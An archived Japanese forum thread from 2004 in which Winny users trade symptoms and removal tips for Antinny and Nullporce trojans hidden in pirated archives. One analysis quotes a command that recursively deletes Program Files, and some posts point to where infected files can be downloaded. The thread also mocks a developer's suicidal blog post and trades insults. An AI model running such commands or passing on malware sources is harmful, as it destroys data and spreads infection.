ttp://homepage2.nifty.com/winfaq/walign.html

183 :[名無し]さん(bin+cue).rar:04/08/12 19:23 ID:rpo8S5Rm
>>138 >>181
情報アリガd
98とXPでは違う動作になるのかな。
>>181はとりあえずスタートアップフォルダもみといてくれ。
98のレジストリはよーわからんスマソ。

184 :[名無し]さん(bin+cue).rar:04/08/12 19:43 ID:YZh9+0Q5
Antinny.Gでレジストリエディタをメモ帳にされたのですが
上書きしてもメモ帳のままです。どうしたら良いのですか?

185 :[名無し]さん(bin+cue).rar:04/08/12 20:48 ID:or8M3uK4
バスターTROJ_NULLPORCE.Bキタ━━━(゚∀゚)━━━!!!!
って解説できてないから、どれだかわかんねぇorz

>>184
http://www.geocities.jp/kemkzuenc/Antinny.html
FAQ4

186 :[名無し]さん(bin+cue).rar:04/08/12 21:15 ID:hEaRuTA9
>>184
男は黙って、クリーンインスコ(フォーマット後→OS再インストール)
女はそのまま晒し続けてください…

187 :[名無し]さん(bin+cue).rar:04/08/12 21:19 ID:yHROXw3u
>>167
何か面白かったw
みんな、ああいう風な被害を受けたんだなと。
漏れも気をつけないとヒヤヒヤ

188 :185:04/08/12 21:32 ID:or8M3uK4
英語の解説ページあった。スクリーンセーバー型に対応したみたい。
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NULLPORCE.B&VSect=T

英語ページに「かっとばせ ヌルポース」ワロタ

189 :[名無し]さん(bin+cue).rar:04/08/12 21:37 ID:j72ohmAG
>>188
(゚∀゚)ワロタ

190 :[名無し]さん(bin+cue).rar:04/08/12 21:43 ID:DGuLljMw
>>188
どうせならダイアログの中身も英訳してほしかったな(w。

191 :185:04/08/12 21:46 ID:or8M3uK4
セキュ板のウイルス質問スレに>>188のコピペされてたのもワロタ

192 :[名無し]さん(bin+cue).rar:04/08/12 21:55 ID:qweU+l4X
このヌルポースってのはスタートアップさえ監視してればokってことでok?

193 :[名無し]さん(bin+cue).rar:04/08/12 22:26 ID:y2w2B9lM
>>192
いわゆる「脆弱性」に対応した解凍ソフト使えば、そんなに
心配しなくていいんじゃない?

194 :[名無し]さん(bin+cue).rar:04/08/13 00:46 ID:l0/Za9UB
ウイルス作ってる時間とか試行錯誤してる姿想像したら俺の勝ちだなぁと思うpupu
ヤター

195 :[名無し]さん(bin+cue).rar:04/08/13 00:54 ID:RbpPxnJj
>>192
実行可能なファイルが含まれてるアーカイブは問答無用で待避させるだけでいいでしょ。

196 :[名無し]さん(bin+cue).rar:04/08/13 01:32 ID:KqGyoLIQ
多くの解凍ソフトに指定外の場所へファイルが解凍されてしまう脆弱性が存在
ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html

197 :[名無し]さん(bin+cue).rar:04/08/13 05:22 ID:ovwihOb2
感染してみたいと思った
ttp://www.itmedia.co.jp/enterprise/articles/0408/12/news038_2.html

198 :[名無し]さん(bin+cue).rar:04/08/13 06:12 ID:hY54uAjO
その記事書いた記者さんは、絶対2ちゃんねらーだよな。
ひさしぶりに大笑いしました。

199 :[名無し]さん(bin+cue).rar:04/08/13 07:19 ID:ixodCUPx
ヌルポースに関してはとりあえずWinrarなら大丈夫ってこと?

200 :143:04/08/13 08:29 ID:3MD86m2x
おはようございます。
オンラインスキャンをしたら
C:\Documents and Settings\****\Local
Settings\Temp\000001EC
ここにウイルスがいました。
それで検索をして削除しようとしたら先生がさくっと消してく
れました。
>>153サン、みなさん本当にありがとうございました。

ちなみにこんなウイルスでした。
W32.HLLW.Antinny

しかーし再起動したら、また居ました、やつがw
やっぱりレジストリの修復も必要なんですね。
大変勉強になりました。

201 :[名無し]さん(bin+cue).rar:04/08/13 10:45 ID:h+KZavbs
>>200
症状的には>>8亜種、あるいは>>9亜種に該当するのでは?
tempに何度も子が作られているのかな。レジストリ修復だけでなく
全スキャンしとけ。つーか、新亜種は何するか分からんから
クリーンインスコを推奨するが

202 :[名無し]さん(bin+cue).rar:04/08/13 10:58 ID:fkPUtojK
解凍ソフト、脆弱性報告受けて大半がverうp。
最新版にしとけ、ってことだな。

203 :[名無し]さん(bin+cue).rar:04/08/13 11:13 ID:cnpoLPfc
それにしても次回予告.exe作った香具師は頭の柔らかい思考を持ってるなぁ、感心した

204 :143:04/08/13 11:19 ID:3MD86m2x
>>201
dくす!!
レジストリ見てみたんですが
怪しいところはなかったですね〜。
奴がいたらクリーンインスコします。

ほんとお世話になりました。

205 :[名無し]さん(bin+cue).rar:04/08/13 11:45 ID:9LHs3Tv0
俺が愛用してる+Lhacaもアップデートしたようだな。

206 :かっとばせ ヌルポーズ:04/08/13 12:13 ID:L0PmH+n6
ぬるぽ ぬるぽ オートラン♪
ヌルポ ヌルポ AutoRun♪
ぬるぽ ぬるぽ オートラン♪
お前が踏まなきゃ誰が踏む!

207 :[名無し]さん(bin+cue).rar:04/08/13 12:19 ID:9LHs3Tv0
Nobody step it on without you!

208 :[名無し]さん(bin+cue).rar:04/08/13 13:05 ID:YPZFHXli
Lhasaもバージョンアップしてるんだな、ひそかに。

209 :[名無し]さん(bin+cue).rar:04/08/13 17:41 ID:JlWAPR7O
特に気にしてなかったけど
ラズ使いの自分も一安心。

210 :[名無し]さん(bin+cue).rar:04/08/13 18:51 ID:yYCDC5Rl
RAR使いの漏れは蚊帳の外

211 :[名無し]さん(bin+cue).rar:04/08/13 19:13 ID:UiEHAOZl
圧縮ファイルの中からEXE形式を削除するツール
Antinny等のウィルス対策用ツール
--------------------------------------------------------------------------------
動作OS:WindowsXP WindowsMe Windows2000 Windows98 Windows95 WindowsNT
動作機種:汎用
ソフトの種類:フリーソフト
作者:A-tomo 

圧縮ファイルの中から拡張子がEXE等の危険な可能性のあるファイルを検索して、
削除するツールです。キンタマウィルスをはじめとした、Antinny系の対策に最適です。
たとえば、動画や音楽など、EXE形式が入っているはずがない圧縮ファイルを、
解凍する前に事前に検査しておいて、感染するリスクを抑える...といった効果があります。
LHA(*.lzh)、ZIP(*.zip)検査/削除と、RAR(*.rar)の検査に対応しています。

ttp://www.vector.co.jp/soft/win95/util/se330228.html


作者はnyユーザー?

212 :[名無し]さん(bin+cue).rar:04/08/13 19:21 ID:cnpoLPfc
ノートンのAutoProtectみたいに常駐してターゲットフォルダを監視してくれれればいいのにね

213 :[名無し]さん(bin+cue).rar:04/08/13 19:52 ID:alZzEaz8
>>211 そいつは便利だよ 俺はny始めると同時に入れた
    俺みたいなウッカリ者にはいいツール

214 :[名無し]さん(bin+cue).rar:04/08/13 19:56 ID:FJPvOwkl
>>211の作者のサイト行ってみた。

>ブログ作りました
>ブログつくりました。
>暇だったら見てください。

見てみた。

>ロープ買いました [ 8 ]  ■メンヘル A-tomo

>直径8mm、長さ5メートルのロープ.
>首吊り用にロープ買ってきました。
>あとは死ぬだけですね☆



('A`)

215 :[名無し]さん(bin+cue).rar:04/08/13 19:57 ID:wcxtFMMk
>>214の肛門に愛と言う名の花を咲かせたい!

216 :[名無し]さん(bin+cue).rar:04/08/13 20:13 ID:k5d9SiZD
>>214
この作者、”急死”って名前のソフトも作ってるよね。。

217 :[名無し]さん(bin+cue).rar:04/08/13 20:47 ID:uojlApv+
つか、普通ウィルススキャンかけてから解凍するだろ?

いきなり解凍すっから感染すんだろが

218 :[名無し]さん(bin+cue).rar:04/08/13 20:49 ID:Ei5OhDn8

馬鹿?

219 :[名無し]さん(bin+cue).rar:04/08/13 20:50 ID:cnpoLPfc
ほっとけ

220 :[名無し]さん(bin+cue).rar:04/08/13 20:51 ID:xxdm1FSJ
ウィルスバスターの反応できない新種のウィルス入りだったらどうすんだろう

221 :[名無し]さん(bin+cue).rar:04/08/13 20:52 ID:gs2FJ/+H
とりあえずダブルクリック

222 :[名無し]さん(bin+cue).rar:04/08/13 20:56 ID:u+Oq+86g
>>217
ニヤニヤ

223 :[名無し]さん(bin+cue).rar:04/08/13 21:01 ID:8OJXGEqE
>>217
ニーヤニヤ

224 :[名無し]さん(bin+cue).rar:04/08/13 21:02 ID:yYCDC5Rl
>>217みたいな香具師が、次回予告食らったと言って
このスレに泣きついてくるんだろうなぁ・・・

225 :[名無し]さん(bin+cue).rar:04/08/13 21:37 ID:oHDZys8W
nyで広まるようなのは、アンチウィルスソフトは役に立たないと思ったほうがいいのにな
一通り対応がわかって収まった頃に対応するもんだ

226 :[名無し]さん(bin+cue).rar:04/08/13 21:43 ID:vENFYGaN
>225
祭終了かね

ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NULLPORCE.B
Detection available: Aug. 7, 2004
ttp://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.nullpos.html
発見日 2004年08月12日 (米国時間)

パターンはできているが先生が定例LiveUpdateに乗っけるのは18日。
解析結果を見ると増殖機能なしで、VBで書いたジョークプログラムラスイ

227 :[名無し]さん(bin+cue).rar:04/08/13 22:09 ID:oHDZys8W
ずっと前のタイマーのやつがAだから今度はBか
Bはお遊びが入ってるよな

228 :[名無し]さん(bin+cue).rar:04/08/13 22:30 ID:hPEVAk/D
>>217
お前は書き込む前に自分の脳をCTスキャンしてもらえ

229 :[名無し]さん(bin+cue).rar:04/08/14 00:24 ID:4OMwgPHb
12日の最新での検出できないヌルポースを先生に送ってみた
明後日には対応するかな・・・・・・



230 :[名無し]さん(bin+cue).rar:04/08/14 00:28 ID:8va5casL
ctrl+alt+deleteでタスクリスト出してみたが




どれもこれもゲロ以下の臭いがプンプンするゼエエ

231 :[名無し]さん(bin+cue).rar:04/08/14 01:13 ID:NTmZCBby
どなたかヌルポースうぷしてもらえませんか?
>>197みて感染してみたいって人多いと思うんだけど。

232 :[名無し]さん(bin+cue).rar:04/08/14 01:26 ID:W5G8tLYB
自分も欲しいです。

233 :[名無し]さん(bin+cue).rar:04/08/14 01:27 ID:MXOoYL5I
少し前に誰かが「次回予告.exe」をうpしてくれてたんだけどな。
うちのVPCで実行したら、例のダイアログが出たよ。

234 :[名無し]さん(bin+cue).rar:04/08/14 01:35 ID:6nvmz6K6
               /゚    。
               / .  ゚
           , '    。  ・
` ー  _   -  '   ゜
。       .      。  ゚
    :     。
゚             .
  ヾ冖フ  ヾス
   [ ,]   [ ]     、_ノ、_人_人_人_人_人_人_人_人_人_人_
   |. i /l,ィ .!     ノ
.   !  }.r`'j7 !    _)  みんな!
   ! `、亠 {     )   オラにちょっとずつ
    } _l _,l_,j    _)     Nullporceを分けてくれ!
    ヽシ_,-i {      _)
     /`´~バ}       '^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^
.   /   j !
    ∧ '"/`,イ
   ! ヽ'/l_  j
  / \,/ }\,!
  .ァ、ヽィ  <`-イ
.  |. `iT.   ヽ j
  \ll'

235 :[名無し]さん(bin+cue).rar:04/08/14 01:40 ID:H71L1hE9
別にnyやってるわけじゃないのに感染しちゃったよ<ぬるぽ
遺失物なんとかとかいうファイルが出たのと
タスクマネージャーが開けないこと以外今のところなんも問題なし
おー怖い怖い


236 :[名無し]さん(bin+cue).rar:04/08/14 01:47 ID:OUH0vu6K
>231-232
苺5Mの1148に入ってるかも入ってないかもしれない

237 :[名無し]さん(bin+cue).rar:04/08/14 01:48 ID:H71L1hE9
↑入ってる
漏れが踏んじゃったのそれですわ

238 :[名無し]さん(bin+cue).rar:04/08/14 02:01 ID:m9e7IobB
:.,' . : : ; .::i'メ、,_  i.::l ';:.: l '、:.:::! l::! : :'、:i'、: : !, : : : : : :l:.'、: :
'! ,' . : i .;'l;' _,,ニ';、,iソ  '; :l ,';.::! i:.!  : '、!:';:. :!:. : : : :.; i : :'、:
i:.i、: :。:!.i.:',r'゙,rf"`'iミ,`'' ゙ ';.i `N,_i;i___,,_,'、-';‐l'i'':':':':‐!: i : : '、
i:.!:'、: :.:!l :'゙ i゙:;i{igil};:;l'   ヾ!  'i : l',r',テr'‐ミ;‐ミ';i:'i::. : i i i : : :i
:!!゚:i.'、o:'、 ゙、::゙''".::ノ        i゙:;:li,__,ノ;:'.、'、 :'i:::. i. !! : : !:
.' :,'. :゙>;::'、⊂‐ニ;;'´          '、';{|llll!: :;ノ ! : !::i. : : : : i :      あやまれ!!
: :,' /. :iヾ、   `        、._. ミ;;--‐'´.  /.:i;!o: : : :i :       >>234
: ; : ,' : : i.:      <_       ` ' ' ``'‐⊃./. :,: : : O: i. :       Nullporce踏んだみんなに
: i ,'. . : :',      、,,_            ,.:': ,r'. : , : : !: :       あやまれ!!
:,'/. : : . :;::'、     ゙|llllllllllllF':-.、       ,r';、r': . : :,i. : ;i : :      
i,': : : :.::;.'.:::;`、    |llllH". : : : :`、    ,rシイ...: : ; : :/:i : i:!::i:
;'. : :..:::;':::::;':::::`.、  |ソ/. : : : : : : ;,! ,/'゙. /.:::: :,:': :./',:!: j:;:i;!;
i. : .:::;:'i::::;':::::::::i::`:.、;゙、';‐ 、,;__;,/ノ  . :,/.:::: :/. : :/.:::i. j:;;;;;;;;
l .:::;:'::;':::;':::::::::::i::::i::`:,`'-二'‐-‐''゙_,、-.':゙/.:::: ;ィ': : :/.:::::i: j、;;;;;;;
.:::;:':::;':::;'::::::::::::::i:::i:::::..`'‐、、、-<゙.::::::::/.::: ://. : /.:::::::i :j::.'、:;;;

239 :[名無し]さん(bin+cue).rar:04/08/14 02:13 ID:ldBXbrx8
       /.\`/  |二...-┘ ヽ
.        i   ,.>、;/ー- 、    l
       ! ∠.._;'____\   |
      ,!イ く二>,.、 <二>`\.、ヽ.
     /'´レ--‐'ノ. `ー---- 、 |\ ヽ、  
    \  `l  (!"      Jfヽ!  `''-;ゝ
      `‐、jヽ ヾニニ>   ゙イ" }_,,. ‐''´   感染しなければ
         `´\  ー   / ,ィ_}        どうということはない
.          |_ `ー ''´ _」'
        _,.| ~||「  ̄ 人|、._
  ,r==;"´  ヽ ミ|||彡   / ` ー`==、-、
. ///,イ  ___ ヽ|||_,,. ‐''´___  | | | |ヽ

240 :[名無し]さん(bin+cue).rar:04/08/14 02:20 ID:BXECT+Tz
そういうのは他のスレでやってくれ。つまらんから

241 :[名無し]さん(bin+cue).rar:04/08/14 02:37 ID:HsxZKL+r
>>235
%Windows% フォルダに %System%TASKMGR.EXE をコピーします。


わざわざコピー作ってくれてから改ざんするって
人がいい作者だよなw

242 :[名無し]さん(bin+cue).rar:04/08/14 02:44 ID:cERYysQT
しかし、>>211のツールでexeが消されるようになると
.comとか.batとか.pif .scr .cmdの亜種が出るな。
後、解凍ツールの脆弱性で好きなフォルダに送り込めるのなら、
必ずコールされるような.dllとかに偽装上書きしてもいいんだし。

ヤヴィ時代だねぇ

243 :[名無し]さん(bin+cue).rar:04/08/14 03:12 ID:ytbKDj7G
>>231
好きなやっちゃ。ジャンプスレに無視ファイルの蓮張ってあったよ

(一般コミック・雑誌) [ジャンプ] [2004-37・38] DEATH NOTE-34.RAR,qkSk5As1Z0,0,0,73984520b2002127f95f290984e3591f,0,1,1


244 :[名無し]さん(bin+cue).rar:04/08/14 03:14 ID:Q1cQEEo5
>>242
なるほど.exeだけじゃなくて
.com. bat. pif .scr .cmd  .dll
を検索掛けて全部消しちまうのがいいんだな

245 :[名無し]さん(bin+cue).rar:04/08/14 03:15 ID:Q1cQEEo5
後は.folder .html .htmだっけ?
これぐらいかな?拡張子で危険なのは

246 :[名無し]さん(bin+cue).rar:04/08/14 03:51 ID:irZSnrxl
苺の5Mの
up1148.rar *かりたい 4.7MB 04/08/13(Fri),19:57:38 application/octet-stream

これがヌルプォースらしいよ
誰か落としてスクリーンセーバーだけクレw

247 :[名無し]さん(bin+cue).rar:04/08/14 04:24 ID:ESKAeE+G
わかってるなら自分で落とせよハゲ

248 :[名無し]さん(bin+cue).rar:04/08/14 04:27 ID:WtmbjmuV
>>211
おお、これ便利なツールだね。
dllが足りなかったんで、落としてインストールしたら
ちゃんと検査できたよ。


249 :[名無し]さん(bin+cue).rar:04/08/14 05:35 ID:JUa2ps62
zipファイルにAntinnyを含んだexeがあるのですが実行しなければ平気ですか?

250 :[名無し]さん(bin+cue).rar:04/08/14 06:23 ID:m8DNTE6H
うn

251 :[名無し]さん(bin+cue).rar:04/08/14 06:35 ID:W5G8tLYB
ぬるぽーすゲトー
おまいらアリガト

252 :[名無し]さん(bin+cue).rar:04/08/14 08:38 ID:BXECT+Tz
>>248
感染したてたのにやっと気づいたってこと?マヌケな

253 :[名無し]さん(bin+cue).rar:04/08/14 09:42 ID:m6F5y6Rj

【使用OS】WinXP PRO SP1
【WindowsUpdateしてるか】自動実行
【AntiVirusは】avast! Antivirus
【ちゃんとUpdateしてるか】自動実行
【スキャンした結果】スキャンできず
【オンラインスキャンしたならその結果は】発見されず(ノートンオンライン)
ただ、OSインスコドライブはE:\なのですが、C:\しか検索していなかった模様
ウイルスバスターオンラインは実行できず。
【Winnyのバージョン】2b724
【Winny歴、総DL量は】1年位。総DL量は計測不能
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】かかってから読みました(TT)
【症状か具体的に、分かる限りすべて書く】
画面の前面に♂♀の絵と、ギシギシアンアンな声が出てきて操作不能になりました。

おそらく>>87 氏と同じ症状です。

おそらくexeファイルを起動させると上記症状が出るようです。ウイルスチェックソフトとIEを削除されました。(IEショートカットで見つからなくなっただけ?)
exeファイルが開けないのでレジストリエディタ、MSCONFIGなども開けません。
メモ帳は起動できることは判明。
【何をしたらそんなことになったのか】
Winnyにて「ネタバレ (一般コミック・雑誌) [ジャンプ] [2004-39] DEATH NOTE-35」をDL
中にある「偽装解除.bat」を起動(拡張子はbatですがメモ帳で開くとbatファイルではなくプログラムっぽかった)
【これまでにとった措置】
セーフモードで起動、エクスプローラだけは起動できるのでそれでネットに接続し情報収集中。

再インストールしか方法はないのでしょうか…?
どなたか情報お持ちの方いらっしゃいませんか?



254 :[名無し]さん(bin+cue).rar:04/08/14 09:57 ID:w8LYqaFR
>>242
偽装解除.batキタ━━━━━━(゚∀゚)━━━━━━!!!!!
.batがきましたよ。

255 :[名無し]さん(bin+cue).rar:04/08/14 10:02 ID:cKTbisfP
>253
>【Winnyのバージョン】2b724

これ何?クラック?

256 :[名無し]さん(bin+cue).rar:04/08/14 10:28 ID:9u1GY0d+
Nullporceと次回予告.exeは別物なの?

257 :[名無し]さん(bin+cue).rar:04/08/14 10:42 ID:Aga15X06
おまえら>>211なんていれるくらいならSSM入れろって。マジでいいから。
さっき試しにスタートアップにexe入れて再起動しようとしたら、再起動する前にstartupが書き替えられた時点で警告してくれたよ。

258 :[名無し]さん(bin+cue).rar:04/08/14 11:19 ID:9ozgmAYh
OSのインストールってE:\とかにもできるの?

259 :[名無し]さん(bin+cue).rar:04/08/14 12:12 ID:Ht6oKqRm
またDEATH NOTEか
>>253 今度からdelexeとSSMいれとけ 
    クラックは時限式とか田代砲搭載と聞いたが・・・
    .bat=.exeだと思うんだが 初歩的な(・∀・)ワナ!!


260 :[名無し]さん(bin+cue).rar:04/08/14 12:14 ID:OZnCQJyQ
試しにDEATH NOTEで片っ端から落としてみた。



・・・半分近くが実行ファイルが入っていた。
最新ウィルスが欲しかったらDEATH NOTEか?

261 :[名無し]さん(bin+cue).rar:04/08/14 12:17 ID:YjrXkbHN
何故ですのーとなんだ?
良質の餌なのか?

262 :[名無し]さん(bin+cue).rar:04/08/14 12:27 ID:v37D3LSh
.batの内容キボンヌ

263 :[名無し]さん(bin+cue).rar:04/08/14 12:37 ID:H/gVKUHI
要するに、ノートンとWinRAR使ってりゃあモウマンタイって事だろ。
くだらない

264 :[名無し]さん(bin+cue).rar:04/08/14 12:38 ID:Z5mOwXkL
なぜノートン?

265 :[名無し]さん(bin+cue).rar:04/08/14 12:49 ID:Ht6oKqRm
先生よかdelexeだろ 先生だって万能じゃないし
亜種にはついていけない

266 :[名無し]さん(bin+cue).rar:04/08/14 13:02 ID:OZnCQJyQ
先生は腕組みして立っていてくれるだけで十分だ

267 :[名無し]さん(bin+cue).rar:04/08/14 13:20 ID:v37D3LSh
SSM興味あるけど、スレ読んでると設定とかめんどくさそうで
導入に踏み切れないな〜。
とりあえず今は落としたzipは、覗き見&ウイルススキャン
解凍しないでビューアーで閲覧で対応してマツ。

268 :[名無し]さん(bin+cue).rar:04/08/14 13:23 ID:dm4lDeV7
SSM入れたら片っ端からルール作っていけばいいのかな?
何も考えずに。ルール設定後に新規で感染してたら防げる?
はっきり言ってどれを通していいか分からないよね

269 :[名無し]さん(bin+cue).rar:04/08/14 14:39 ID:uB5Cw4RJ
先生先生って、先生といえばワトソンだろう

270 :[名無し]さん(bin+cue).rar:04/08/14 15:09 ID:17oIWqp3
いや、サムソンだろ

271 :[名無し]さん(bin+cue).rar:04/08/14 15:10 ID:kNtndAML
いや、アドォンだろ

272 :[名無し]さん(bin+cue).rar:04/08/14 15:50 ID:osfOjZJ2
なんか、曇ってきた。

273 :[名無し]さん(bin+cue).rar:04/08/14 16:11 ID:Aga15X06
>>268
今現在感染していないなら、てけとーに設定してもantiny程度なら余裕で防げるんじゃないかと。
まず普段使うものは全てallowしておく。iexprore.exeとかnotepad.exeやtaskmgr.exeやjane2ch.exe等。
未登録exeは警告するはずなのでその時にallowしなければ大丈夫。
あとOptionのAlert on registry change にチェックを忘れずに。
まあいろいろやってみるといいよ。

274 :[名無し]さん(bin+cue).rar:04/08/14 16:38 ID:gH0zPxnd
>>259
なんで.bat=.exeになるんだ?
バッチファイルと実行ファイルが同じって初めて聞いたぞ
.comと.exeならDOSと窓の違いだけで同じものだがな

>>263
ノートンは国産のウィルスは弱い
Antinnyもどこまで対応してるかわからんし
かといって新種はバスターよりノートンの方が速いしな


275 :[名無し]さん(bin+cue).rar:04/08/14 16:51 ID:Ht6oKqRm
>>274 (´・ω・`) マチガエタヨ ゴメンポ

276 :[名無し]さん(bin+cue).rar:04/08/14 16:52 ID:cERYysQT
>>274
実行できるんだから、同じだよ。

277 :[名無し]さん(bin+cue).rar:04/08/14 16:57 ID:cERYysQT
スラドに出てたが、
>スタートアップからSMTPサーバを起動してしまえば、メールで広まるウィルスに。
>スタートアップにBIOS書き換えプログラムを入れてしまえば、BIOS破壊ウィルスに。
>スタートアップから起動し、LANにつながっているマシンを調べて、共有フォルダに自分自身をコピーすれば、LANで広がるウィルスに。

うげぇ

278 :[名無し]さん(bin+cue).rar:04/08/14 17:28 ID:ysKYhvL1
SSMでググってみたんだがどれだか分からん

279 :[名無し]さん(bin+cue).rar:04/08/14 17:41 ID:WtmbjmuV
>>252
いいや。間抜けはお前だ。
既存の圧縮ファイルで実験して、ちゃんと検出するか確認したまで。
WinRAR使ってるし、感染したことなどないよ。

280 :[名無し]さん(bin+cue).rar:04/08/14 17:52 ID:v37D3LSh
>>278
System Safety Monitorのこと。セキュ版に専用スレがある。

281 :[名無し]さん(bin+cue).rar:04/08/14 18:12 ID:O2HnFE9v
明らかにスレをまともに読んでない椰子にレスすんなデブ
と思ったらこいつ自信最近知ったんで誰かに教えたくてしょうがねーってやつか
とりあえず氏ね

282 :[名無し]さん(bin+cue).rar:04/08/14 18:13 ID:6XRJFfph
みのさん・・

283 :[名無し]さん(bin+cue).rar:04/08/14 18:18 ID:DJuBhIca
ファイルコンパクチはどうなの?

284 :[名無し]さん(bin+cue).rar:04/08/14 18:52 ID:o+DgMjak
てすと

285 :[名無し]さん(bin+cue).rar:04/08/14 19:10 ID:SwvPTPzj
SSMヘルプ翻訳テキスト配布サイト
ttp://www.geocities.co.jp/Outdoors-Mountain/9671/ssm/
OutPost and 2ch
ttp://www.geocities.jp/outpost_2ch/

286 :[名無し]さん(bin+cue).rar:04/08/14 19:17 ID:6eIpXaF9
>>274
.exeを.batに書き換えてみろ。

287 :[名無し]さん(bin+cue).rar:04/08/14 19:57 ID:0cWmFlWq
>>211
以前ここでこきおろされた圧縮ファイルから.exeを削除するってソフトとなんか違うのか?

288 :[名無し]さん(bin+cue).rar:04/08/14 21:19 ID:aXk8Axfi
(同人誌)(C66)[bolze](プリンセスメーカー)princess shaker.lzh 2117951aa523ac59304cfab689e33eaf
内のexeってなんかの亜種?
スキャンかけても検出されず、寝ぼけてたもんだからうっかり実行するとこだった
VPC上で試してあちこち探し回ったが、これといった痕跡がみつからず。テンポラリに
フェイク表示用のJPGが残ってるだけだった。

289 :[名無し]さん(bin+cue).rar:04/08/14 21:38 ID:cERYysQT
>>288
exeのファイル容量を教えれ! バイナリエディタで内部を覗いて見るとか?

290 :[名無し]さん(bin+cue).rar:04/08/14 22:00 ID:BanwANs2
覗いた所でどんな動作するかわかるもんなの?

291 :[名無し]さん(bin+cue).rar:04/08/14 22:35 ID:7YQpwlPQ
>>288
コミケ66前から流れてるその辺の.exe入りは、何らかのトラップとみなして良いんじゃね?

物が何かまでは知らんけど


>>290
ダイアログ用の文字列とか見えたりするし
例の「ぬるぽぬるぽAutoRun」が有ればモノホンか亜種とアタリが付いたり

292 :[名無し]さん(bin+cue).rar:04/08/15 00:11 ID:RwluiYkV
>>291
見えたのって「次号予告」?SIZE:53340 CRC32:1E5CE3D5

 こっちは曲が鳴らず配布性があるんじゃないかという気がしてきた。
つまり、こないだ先生とバスターが対応したITmediaの記事とは違う
ものですな(手持ちの先生はTrojan Hourseとして認知)。

293 :[名無し]さん(bin+cue).rar:04/08/15 01:11 ID:Iy2SGYXy
>>253氏と同じ症状になり先ほど再セットアップしました。
当方XPなのですがタスクマネージャーが起動できない状態でした。
原因のファイルは253氏と同じものです。
ノーd先生でスキャンをかけたところ反応無しだったので意気揚揚とWクリックしたらこのザマです。○| ̄|_

294 :[名無し]さん(bin+cue).rar:04/08/15 01:18 ID:eo4FE8UF
>>293
危険ファイルの現物どこかにうぷ出来ない?
もう消えた?

295 :[名無し]さん(bin+cue).rar:04/08/15 01:24 ID:32eZ5zPc
今、ジャンプのファイル落として解凍すれば
最新のウィルスに感染できそうな感じですね。
私も次回予告.exeにやられかけました。

でも、ウィルス流してる奴はなんでジャンプが
うぃにーで流れるのジャマしようとするんだろう?
ウィルス流してる奴は集英社関係者なのか?

296 :[名無し]さん(bin+cue).rar:04/08/15 01:32 ID:K0+plORJ
>>295
落とす奴が多いからじゃないのか?

297 :[名無し]さん(bin+cue).rar:04/08/15 01:52 ID:TbZeSmMz
単なる愉快犯だろ
C66新作同人誌も
捏造&ウィルスだらけだよ

298 :[名無し]さん(bin+cue).rar:04/08/15 02:06 ID:jnNAB1LG
次回予告.exeを実行しなければいいんじゃないの?

299 :[名無し]さん(bin+cue).rar:04/08/15 02:23 ID:NI9tvCC0
ちっくら、C66関係の新作ダウソして、未発見ウイルス(つーか)
ワームを解析してみる。

300 :[名無し]さん(bin+cue).rar:04/08/15 02:31 ID:IX7tfahW
>>298
ニヤニヤ

301 :[名無し]さん(bin+cue).rar:04/08/15 02:46 ID:snyfVrlN
('A`)
ノートン


302 :[名無し]さん(bin+cue).rar:04/08/15 03:08 ID:SvCfF6hU
>>301
うまい

303 :[名無し]さん(bin+cue).rar:04/08/15 03:37 ID:jnNAB1LG
みんなコミケに備えてて一匹しか釣れなかったんで寝る。

304 :[名無し]さん(bin+cue).rar:04/08/15 04:13 ID:6Wb5qTFN
>>289
382kbでjpg偽装

305 :[名無し]さん(bin+cue).rar:04/08/15 08:24 ID:RwluiYkV
>>253
該当ファイルを手に入れたので軽くチェックしたが、VBで書いてある。


表示される♂♀はイラスト(笑)で♂が青、♀がマゼンタだろ??
ギシギシアンアンはどっかのAVからのコピーと推測

.BATでもエクスプローラー上でダブルクリックすると内部がEXEなら起動し
ちゃうのは脆弱性と言えるのかな? アイコンもBAT標準に偽装されるしなぁ

破壊活動は………と。こんな文字列があるな

cmd /c rmdir /s /q "%ProgramFiles%

チーン。ご愁傷様(ヘタレ解析だから100%信用するなよ)

306 :[名無し]さん(bin+cue).rar:04/08/15 10:50 ID:SV9D9TaZ
>>288
Program files\accessories\ 下に accessories_start.exe を
作って起動実行に記述有りだった。
気づいてレジストリをチェックしても名前からsystem側が使用する何かと
勘違いしたらそのままスルーするかも。
物自体判定するスキルはないので他の人ドゾー

307 :[名無し]さん(bin+cue).rar:04/08/15 10:59 ID:Iy2SGYXy
>>253のバッチファイル手に入ったんだけどうpした方がいい?

308 :[名無し]さん(bin+cue).rar:04/08/15 11:13 ID:ysdlvEie
俺もギシギシアンアンにやられたーよ。
ウイルスチェックしても何も掛からなかったから、どんなもんだろうって思って開いたらウワーン

今のところ解決法は無いのか・・・?
誰かほんとお願いしまつ。俺にはサパーリ。

309 :[名無し]さん(bin+cue).rar:04/08/15 12:02 ID:oNh31STz
1.スタンドアローンのパソコンでも空気感染することがあるので常に注意が必要だ。


310 :[名無し]さん(bin+cue).rar:04/08/15 12:27 ID:tonfVYcj
>>308
>どんなもんだろうって思って開いたらウワーン
不注意なお前が馬鹿

311 :[名無し]さん(bin+cue).rar:04/08/15 12:33 ID:CX1CPVIl
>>220-221
本当にこの流れなんだな


312 :[名無し]さん(bin+cue).rar:04/08/15 13:17 ID:YXh3nCqp
>>253
同じく踏んでしまったものです。
システムの復元で現在元通りなような・・・

313 :[名無し]さん(bin+cue).rar:04/08/15 13:31 ID:7qIBm0+/
映画で世界の中心で愛をさけぶEXE.AVIって書いてあるのをうっかりクリックしてしましました
再生できなかったのでウイルススキャンしたらアンチニーっていうのがでてきました
クリックしたらメディアプレイヤーがでてきただけですが、これだけでも感染するのでしょうか?
感染したらウイルスバスターでは削除できませんか?


314 :[名無し]さん(bin+cue).rar:04/08/15 13:34 ID:D/tzbF+L
死ね

315 :[名無し]さん(bin+cue).rar:04/08/15 13:38 ID:kCNmD8HZ
迷ったらクリーンインスコ

316 :[名無し]さん(bin+cue).rar:04/08/15 13:51 ID:DmOAQCr7
テンプレ読まないor読めないならリカバリー

317 :[名無し]さん(bin+cue).rar:04/08/15 14:20 ID:BdoPOHh/
デスクトップが蓮コラに変わる奴に俺もかかってしまった。
これも解決法ないのか?
